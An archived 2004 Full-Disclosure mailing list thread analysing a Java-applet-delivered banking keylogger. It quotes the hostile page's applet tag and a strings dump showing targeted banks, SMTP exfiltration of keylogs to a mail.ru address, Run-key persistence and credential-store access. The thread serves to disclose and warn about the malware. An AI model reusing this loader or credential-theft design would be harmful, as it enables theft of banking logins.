RE: [Full-Disclosure] Re: http://federalpolice.com:article872@1075686747

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukh_at_online.gateway.technolabs.net)
Date: 02/16/04

  • Next message: S-Quadra Security Research: "[Full-Disclosure] EarlyImpact ProductCart shopping cart software multiple security vulnerabilities"
    To: <n.teusink@planet.nl>, <full-disclosure@lists.netsys.com>
    Date: Mon, 16 Feb 2004 09:22:51 +0530
    
    

    this is a keylogger that will mail out your intresting logs to some russian address!
    so beware of this one,

    but what i couldent understand is how is this file executed ?

    -aditya

    > -----Original Message-----
    > From: full-disclosure-admin@lists.netsys.com
    > [mailto:full-disclosure-admin@lists.netsys.com]On Behalf Of
    > n.teusink@planet.nl
    > Sent: Sunday, February 15, 2004 11:40 PM
    > To: full-disclosure@lists.netsys.com
    > Subject: [Full-Disclosure] Re:
    > http://federalpolice.com:article872@1075686747
    >
    >
    > From the source of that page:
    >
    > APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1
    >
    > BlackBox.class is detected immediately by my virusscanner as
    > ClassLoader/E, more
    > info:
    > http://www.viruslibrary.com/virusinfo/Trojan.Java.ClassLoader.htm
    >
    > The javautil.zip appears to be an exe file renamed to zip. The
    > exe is compressed with
    > FSG.
    >
    > Interresting pieces of output from strings on the decompressed exe:
    >
    >
    > ----------------------------------------------BEGIN
    > HookerDll.Dll
    > Install
    > Uninstall
    > EDIT
    > %s\%s
    > WVS3
    > \kgn.txt
    > Hooker.dll
    > Install
    > Uninstall
    > Westpac
    > bendigo
    > Bendigo
    > e-bendigo
    > e-Bendigo
    > commbank
    > Commonwealth
    > NetBank
    > Citibank
    > Bank of America
    > e-gold
    > e-bullion
    > e-Bullion
    > evocash
    > EVOCash
    > EVOcash
    > intgold
    > INTGold
    > paypal
    > PayPal
    > bankwest
    > Bank West
    > BankWest
    > National Internet Banking
    > cibc
    > CIBC
    > scotiabank
    > ScotiaBank
    > Scotia Bank
    > bank of montreal
    > Bank of Montreal
    > royalbank
    > Royal Bank
    > RoyalBank
    > tdwaterhouse
    > TD Canada Trust
    > TD Waterhouse
    > president's choice
    > President's Choice
    > President Choice
    > suncorpmetway
    > Suncorp
    > macquarie
    > Macquarie
    > INTgold
    > 1mdc
    > 1MDC
    > TD Waterhouse
    > goldmoney
    > GoldMoney
    > goldgrams
    > pecunix
    > Pecunix
    > Pecun!x
    > hyperwallet
    > HyperWallet
    > Wells Fargo
    > Bank One
    > Banesto
    > CAIXA
    > SunTrust
    > Sun Trust
    > Discover Card
    > Washington Mutual
    > Wachovia
    > desjardins
    > Chase
    > 0+060F0
    > 1$11161J1U1i1
    > 2.2I2\2
    > 3'3,3E3c3h3r3
    > 4%42484>4D4J4P4V4\4b4h4n4t4z4
    > DATA
    > EHLO localhost
    > Subject: KeyLog from (%s)
    > MAIL FROM:<pentasatan@mail.ru>
    > RCPT TO:<pentasatan@mail.ru>
    > SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    > open
    > pstorec.dll
    > PStoreCreateInstance
    > internet explorer
    > http://
    > wininetcachecredentials
    > Cookie:
    > ----------------------------------------------END
    >
    > I think you can draw your own conclusions about this file.
    >
    > Niels
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.netsys.com/full-disclosure-charter.html
    >

    ________________________________________________________________________
    Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: S-Quadra Security Research: "[Full-Disclosure] EarlyImpact ProductCart shopping cart software multiple security vulnerabilities"

    Relevant Pages

    • Re: Mac Keyloggers
      ... a key logger on his Windoze Vista PC, stole his bank ... getting a Mac! ... Keylogger" should have you worried:" ...
      (comp.sys.mac.advocacy)
    • Re: Mac Keyloggers
      ... a key logger on his Windoze Vista PC, ... getting a Mac! ... Keylogger" should have you worried:" ...
      (comp.sys.mac.advocacy)
    • Re: Mac Keyloggers
      ... a key logger on his Windoze Vista PC, ... getting a Mac! ... Keylogger" should have you worried:" ...
      (comp.sys.mac.advocacy)
    • Re: Mac Keyloggers
      ... a key logger on his Windoze Vista PC, stole his bank ... getting a Mac! ... Keylogger" should have you worried:" ...
      (comp.sys.mac.advocacy)
    • Cuba slaps back at Canadian bank
      ... Cuba slaps back at Canadian bank ... Diplomat upset U.S. rules apply to Scotiabank ... Garcia Rivera is Cuba's ambassador in Jamaica, and last Friday she angrily closed all her government's accounts at a branch of the Bank of Nova Scotia in the Jamaican capital, ending a business relationship that had lasted a decade or more. ... The Cuban diplomat was referring to a letter dated March 7 from Barrington Chisholm, manager of the Scotiabank branch on Knutsford Blvd. in Kingston, in which Chisholm said his bank is no longer willing to handle U.S. dollar accounts for the Cubans or to carry out international financial transactions on their behalf. ...
      (soc.culture.cuba)